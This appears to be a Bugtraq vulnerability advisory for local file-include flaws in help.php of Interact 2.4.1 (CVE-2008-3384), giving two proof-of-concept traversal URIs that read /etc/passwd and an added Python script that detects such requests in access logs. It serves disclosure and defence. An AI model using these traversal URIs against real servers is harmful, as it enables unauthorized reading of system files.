Interact 'help.php' Multiple Local File Include Vulnerabilities
BID:30315
Info
| Bugtraq ID: | 30315 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-3384 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 21 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Digital Security Research Group [DSecRG] |
| Vulnerable: | Interact Learning Community Environment Interact 2.4.1 |
| Not Vulnerable: | |
Discussion
Interact is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues can allow remote attackers to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Exploit / POC
Attackers can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/help/help.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/help/help.php?file=../../../../../../../../../../../../../etc/passwd
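A detection sketch for requests shaped like the example URIs above, added here as an example and not part of the original advisory: it scans web-server access logs for traversal sequences, null bytes or absolute paths in the `module` and `file` parameters of `help.php`. The log lines, the benign value `forum` and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WATCHED_PARAMS = {"module", "file"}  # parameters from the advisory's URIs
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Jul/2008:10:00:01 +0000] "GET /help/help.php?module=forum HTTP/1.1" 200 512
192.0.2.11 - - [21/Jul/2008:10:00:02 +0000] "GET /help/help.php?module=../../../etc/passwd%00 HTTP/1.1" 200 1843
192.0.2.12 - - [21/Jul/2008:10:00:03 +0000] "GET /help/help.php?file=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843
192.0.2.13 - - [21/Jul/2008:10:00:04 +0000] "GET /index.php?file=../x HTTP/1.1" 404 0
"""

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return (param, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/help.php"):
        return []
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        # parse_qsl decodes once; decode again and normalise separators.
        value = decode_fully(raw).replace("\\", "/")
        if "\x00" in value:
            findings.append((name, "null byte"))
        if ".." in value.split("/"):
            findings.append((name, "directory traversal"))
        if value.startswith("/"):
            findings.append((name, "absolute path"))
    return findings

def scan_log(text):
    """Return (line_number, param, reason) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits += [(lineno, p, r) for p, r in inspect_request(match.group(1))]
    return hits
```

Only the query string is inspected, so parameters sent in a POST body will not appear in a standard access log and need request-body logging or a WAF rule instead.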
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Interact Project Page (Interact)
- [DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1 (Digital Security Research Group [DSecRG])